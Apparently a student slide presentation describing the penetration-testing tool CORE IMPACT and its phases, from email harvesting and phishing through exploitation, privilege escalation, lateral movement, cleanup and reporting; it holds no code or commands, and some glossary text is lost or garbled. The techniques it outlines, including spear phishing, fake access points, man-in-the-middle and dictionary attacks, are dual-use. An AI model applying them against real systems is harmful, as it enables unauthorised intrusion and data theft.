CORE IMPACT

1
CORE IMPACT

• Hamde AL Tamimi
• Mohammad Ali Qattan
• Amira Mosa AL Braim
• Rakan Tayseer

2
What is CORE IMPACT ?

• CORE IMPACT is, in fact, an automated
  penetration(????? ) testing tool, which scans a
  range of hosts looking for Weak Points for which
  it has effective exploits(??????? ).
• These exploits can then be launched against the
  vulnerable(??????? ) hosts to attempt to gain
  access.
• Having gained access to a vulnerable host,CORE
  IMPACT can install Agents which provide varying
  levels of remote access (including directory
  listing, uploading and downloading files, and so
  on).
• It is even possible to use a compromised host to
  launch new penetration tests against other hosts
  on the network which may not have been visible on
  the initial scan.
• This way the penetration tester can move from
  host to host within the compromised network.

3
Cont

• CORE IMPACT thus allows the user to safely
  exploit Weak Points in the network, replicating
  the kinds of access an intruder could achieve,
  and proving actual paths of attacks that must be
  eliminated.
• The product features the Rapid Penetration Test
  (RPT),
• a step-by-step automation of the penetration
  testing process. From the initial information
  gathering phase to production of the final
  report, the penetration testing steps within CORE
  IMPACT can be run completely autonomously. The
  steps in this process include
• Information Gathering
• Attack and Penetration
• Local Information Gathering
• Privilege Escalation(??????? )
• Clean Up
• Report Generation

4
Cont

• Each of the six processes listed previously are
  available as Wizards in the Rapid Penetration
  Test window.
• By following each of them in turn, the average
  user will follow the typical hacker methodology
  recommended by every generic hackers handbook,
  and be able to complete a very comprehensive
  penetration test without recourse to experts or
  outside consultants.
• Of course, experts and consultants will also find
  this tool incredibly useful in their day-to-day
  work

5
Information Gathering

• We have types of test which led to multiple ways
  to gather information
• such as
• Client-Side Rapid Penetration Testing
• Mobile Device Rapid Penetration Testing
• Network Device Rapid Penetration Testing
• Network Rapid Penetration Testing
• Web Application Rapid Penetration Testing
• Wireless Rapid Penetration Testing

6
Client-Side Rapid Penetration Testing

• In the case of end-user testing, Information
  Gathering involves the collection of email
  addresses to target with phishing, spear
  phishing(Instead of casting out thousands of
  e-mails randomly hoping a few victims will bite,
  spear phishers target select groups of people
  with something in commonthey work at the same
  company, bank at the same financial institution,
  ) or other social engineering attacks. CORE
  IMPACT offers a number of modules for gathering
  email addresses of individuals in your
  organization, or you can enter or import your own
  list of email addresses to test.
• Key Capabilities
• Crawl a website to harvest addresses published on
  the site
• The Major effect of search engines to locate
  addresses for a given domain
• Find addresses in Pretty Good Privacy
  (PGP)(Pretty Good Privacy (PGP) is a popular
  program used to encrypt and decrypt e-mail over
  the Internet. ) and Whois databases
• Scan a domain for documents and scrape useful
  information from them, such as email addresses

7
Mobile Device Rapid Penetration Testing

• To specify mobile devices to test, you simply
  enter target device information )such as owner
  name, email address and phone number (into the
  CORE IMPACT interface.

8
Network Device Rapid Penetration Testing

• If CORE IMPACT Differentiate(???? ) the operating
  system of a target and confirms it to be a
  network device, it will attempt to collect
  information about the device. Alternately, CORE
  IMPACT includes a Passive Cisco Discovery
  Protocol (CDP) network discovery module that
  listens for broadcasts from Cisco devices.
• Key Capabilities
• Fingerprint found devices to determine
  manufacturer, device model/type, and operating
  system details
• Determine the inputs on which the device accepts
  connections or instructions, including Simple
  Network Management Protocol (SNMP), Telnet, HTTP,
  etc.

9
Network Rapid Penetration Testing

• The Information Gathering step collects data
  about the targeted network, typically using
  Network Discovery, Port Scanner, and OS and
  Service Identification modules. Alternately, you
  can complete this step by importing information
  from your network mapping tool or Weak Points
  scanner.
• Key Capabilities
• Identify the operating system and services
  running on targeted machines
• Control the IP ranges you want to scan
• Select from a variety of network discovery and
  port scanning methods, including TCP Connect,
  Fast synchronise packet in (TCP) and Internet
  Control Message Protocol (ICMP)

10
Web Application Rapid Penetration Testing

• During this phase of the Web Application Rapid
  Penetration Test, CORE IMPACT crawls through web
  pages and identifies pages to test. Alternately,
  you can import the results from popular web
  application Weak Points scanners and validate
  imported Weak Points for exploitability(???????
  ????????? ).
• Key Capabilities
• Specify a domain or range of web pages to crawl
• Set a link depth limit for the crawler
• Select whether to follow links outside the
  specified site
• Crawl JavaScript to discover and assess
  dynamically generated pages
• Establish the browser type and version to use
• Supply any login information required to emulate
  an attack from someone with access rights to the
  web application
• Import web scanner results for Weak Points
  validation

11
Wireless Rapid Penetration Testing

• CORE IMPACTs discovery capabilities allow users
  to identify both authorized networks and
  unauthorized points of access. It then profiles
  any networks discovered by analyzing signal and
  packet data to measure network strength,
  determine security protocols, and identify
  devices interacting with the involved network.
• Key Capabilities
• Discover both known and unknown Wi-Fi networks
  and access points
• Gather MAC addresses and service set identifiers
  (SSID)(An SSID is the name of a wireless local
  area network (WLAN). All wireless devices on a
  WLAN must employ the same SSID in order to
  communicate with each other. ) from beaconing
  machines
• Impersonate(?????? ??? ) access points, and
  fingerprint / harvest information from systems
  that connect
• Gather information on network strength, security
  protocols and connected devices
• Scan traffic for streams of sensitive data

12
Attack and Penetration

• We also have the same categories mentioned before
  such as
• Client-Side Rapid Penetration Testing
• Mobile Device Rapid Penetration Testing
• Network Device Rapid Penetration Testing
• Network Rapid Penetration Testing
• Web Application Rapid Penetration Testing
• Wireless Rapid Penetration Testing

13
Client-Side Rapid Penetration Testing

• In this test, you create an email, associate it
  with an exploit, and go phishing. The product
  includes sample email templates that simulate
  common phishing attacks. You can also create your
  own custom spear phishing emails that effects
  inside knowledge of your organization.
• CORE IMPACTs big library of client-side exploits
  includes attacks that target endpoint
  applications, endpoint security solutions, and
  endpoint operating systems and services. The
  product also takes care of sending the email,
  giving you options such as selecting an Simple
  Mail Transfer Protocol (SMTP) server or Trick a
  specific from email address.
• Key Capabilities
• Create phishing, spear phishing and spam emails
  from a variety of pre-built templates
• Safely deploy Agents using real-world malware
  attacks(Malware, short for malicious software, is
  software designed to disrupt computer operation,
  gather sensitive information, or gain
  unauthorized access to computer systems. ) to
  test end-user system security
• Track who responds to attacks and measure the
  effectiveness of security awareness programs with
  or without exploiting their systems
• Assess data leakage risks by luring(??????? )
  users to complete imposter(???? ) web forms
• Prove the consequences of a end-user security
  breach by interacting with compromised
  workstations

14
Mobile Device Rapid Penetration Testing

• CORE IMPACT uses real-world attack techniques
  including phishing, web form impersonation, fake
  wireless access points, and wireless
  man-in-the-middle attacks(The man-in-the-middle
  attack is a form of active eavesdropping(?????? )
  in which the attacker makes independent
  connections with the victims and relays messages
  between them, making them believe that they are
  talking directly to each other over a private
  connection, when in fact the entire conversation
  is controlled by the attacker. The attacker must
  be able to intercept all messages going between
  the two victims and inject new ones ) to assess
  end users and their devices.
• Key Capabilities
• Phishing send emails and texts that determine
  whether employees would fall prey to phishing and
  spear phishing attacks by clicking through to
  malicious(???? ) sites and/or installing
  Untrusted mobile apps
• Web Form Impersonation assess data leakage
  threats by doing phishing tests classified with
  links to web forms designed to capture and record
  user-entered data
• Fake Wireless Access Points impersonate valid
  wireless access points and gather profile
  information about the connected devices,
  launching attacks when the device or user
  requests data from the fake access point
• Wireless Man-in-the-Middle identify and monitor
  wireless networks that have either no encryption
  or WEP-based encryption and observe any connected
  devices intercept transmissions and insert
  attacks that target the connected devices

15
Network Device Rapid Penetration Testing

• CORE IMPACT uses dictionary attacks (a dictionary
  attack is a technique for defeating
  authentication mechanism by trying to determine
  its decryption key by searching likely
  possibilities successively trying all the words
  in an list called a dictionary from a
  pre-arranged list of values . )to guess passwords
  and gain access to network devices. Once the
  device is compromised, CORE IMPACT offers various
  modules to explain the ramifications of the
  breach(????? ???????).
• Key Capabilities
• Launch dictionary attacks to gain device access
• Retrieve the configuration file of a compromised
  device and try to crack passwords that are in use
• Rename compromised devices
• Demonstrate how attackers could intercept copies
  of data packets via interface monitoring

16
Network Rapid Penetration Testing

• During Attack and Penetration, CORE IMPACT
  automatically selects and launches remote attacks
  leveraging(????????? ?? ) IP, OS, architecture,
  port and service information obtained in the
  Information Gathering step. You can choose to
  launch every potential attack against each target
  computer, or you can have the system stop once it
  successfully deploys a single Network Agent,
  which carries the attack payload. You maintain
  full control over which computers are attacked
  and the order in which exploits are launched. In
  addition, you can further simplify and speed
  tests by excluding exploits that may leave a
  target service unavailable or take a long time to
  run.
• Key Capabilities
• Launch multiple, many attacks at the time to
  speed the penetration testing process
• Interact with compromised machines via discrete
  Agents that are installed only in system memory
• Run local exploits to attack machines internally,
  rather than from across the network
• Maintain control over which exploits are applied

17
Web Application Rapid Penetration Testing

• CORE IMPACT enables you to test web applications
  for Persistent Cross-Site Scripting (XSS)(Dynamic
  Web sites have a threat that static Web sites
  don't, called "cross-site scripting," also known
  as "XSS." ), Reflective XSS (both for static HTML
  and Adobe Flash objects), Remote File Inclusion
  for PHP applications, SQL Injection, and Blind
  SQL Injection. CORE IMPACT then dynamically
  creates exploits to prove whether the Weak Points
  makes actual threats. If an exploit is
  successful, CORE IMPACT establishes an Agent that
  allows you to take a number of actions to reveal
  at-risk information assets.
• Key Capabilities
• Analyze custom, customized and out-of-the-box web
  applications for security weaknesses
• Validate security exposures using dynamically
  generated exploits, emulating a hacker trying
  various attack paths and methods
• Guess application usernames and passwords with
  dictionary attacks
• The effect of Web Application Firewall (WAF)
  evasion(?????? ) capabilities
• Explain the consequences of an attack by
  interacting with web server file systems and
  databases through command shells and database
  consoles
• Perform penetration tests without corrupting web
  applications or running code on targeted servers

18
(No Transcript)
19
Wireless Rapid Penetration Testing

• CORE IMPACT determines keys by taking advantage
  of known Weak Points in WEP-secured
  networks(Wired Equivalent Privacy (WEP) is a
  security algorithm for IEEE 802.11 wireless
  networks ). The solution also assesses networks
  secured by WPA(Wi-Fi Protected Access (WPA) and
  Wi-Fi Protected Access II (WPA2) are two security
  protocols and security certification programs
  developed to secure wireless computer networks )
  and WPA2 (using a Pre-Shared Key) via dictionary
  attacks that leverage information from sniffed
  authentication attempts. Finally, CORE IMPACT
  enables you to intercept wireless transmissions
  and conduct Man-in-the-Middle attacks
• Key Capabilities
• Replicate attacks against WEP, WPA and
  WPA2-encrypted networks
• Do Man-in-the-Middle attacks, intercept wireless
  transmissions, and insert exploits into relayed
  traffic
• Impersonate access points to connect with
  beaconing systems and test them against remote
  exploits

20
Local Information Gathering

• The Local Information Gathering step collects
  information about computers that have CORE IMPACT
  agents deployed on them. During this step, you
  leverage Network Agents to interact with
  compromised computers and gather previously
  unavailable information about the OS, privileges,
  users and installed applications. CORE IMPACT can
  collect information from all deployed Agents or
  only from those that you specify.
• Key Capabilities
• Browse file structures and view file contents on
  compromised machines
• View rights obtained on compromised machines
• Interact with compromised machines via command
  shells
• Explain the consequences of security breaches by
  replicating the steps an attacker would take
  after gaining access to a system
• Extract data from compromised mobile devices,
  including call, SMS and MMS logs GPS location
  and contact information

21
Privilege Escalation

• During the Privilege Escalation step, CORE IMPACT
  attempts to penetrate deeper into a compromised
  computer by running local exploits in an attempt
  to obtain administrative privileges. After
  Privilege Escalation, you can shift the source
  Agent to one of the newly compromised systems and
  cycle back to the initial Information Gathering
  step, thereby establishing a beachhead from which
  to run attacks deeper into the network.
• Key Capabilities
• Run local exploits to attack systems internally,
  rather than from across the network
• Gain administrative privileges on compromised
  systems
• View the networks to which a compromised computer
  is connected
• Launch attacks from any compromised system to
  other computers on the same network, gaining
  access to systems with increasing levels of
  security

22
Cleanup

• The Cleanup step automatically uninstalls every
  connected Agent. Agents are uninstalled in post
  order to support complex Agent chains. In
  addition, all Agents are automatically
  uninstalled when closing the active workspace,
  regardless of whether the Cleanup step is
  executed or not.
• Key Capabilities
• Quickly and easily remove all Agents from
  compromised machines, leaving your network and
  end-user systems in their original states

23
Penetration Testing Report Generation

• CORE IMPACT generates clear, informative reports
  that provide data about targeted systems and
  applications, results of end-user penetration
  tests, audits of all exploits performed, and
  details about proven Weak Points. You can view
  and print reports using Crystal Reports or export
  them in popular formats such as HTML, PDF and
  Microsoft Word.
• Key Capabilities
• Obtain actionable information about exploited
  Weak Points, compromised end-user systems, web
  application weaknesses and associated risks
• Create activity audits to satisfy Commitment and
  regulatory requirements
• Export report content in popular formats that can
  be easily customized and shared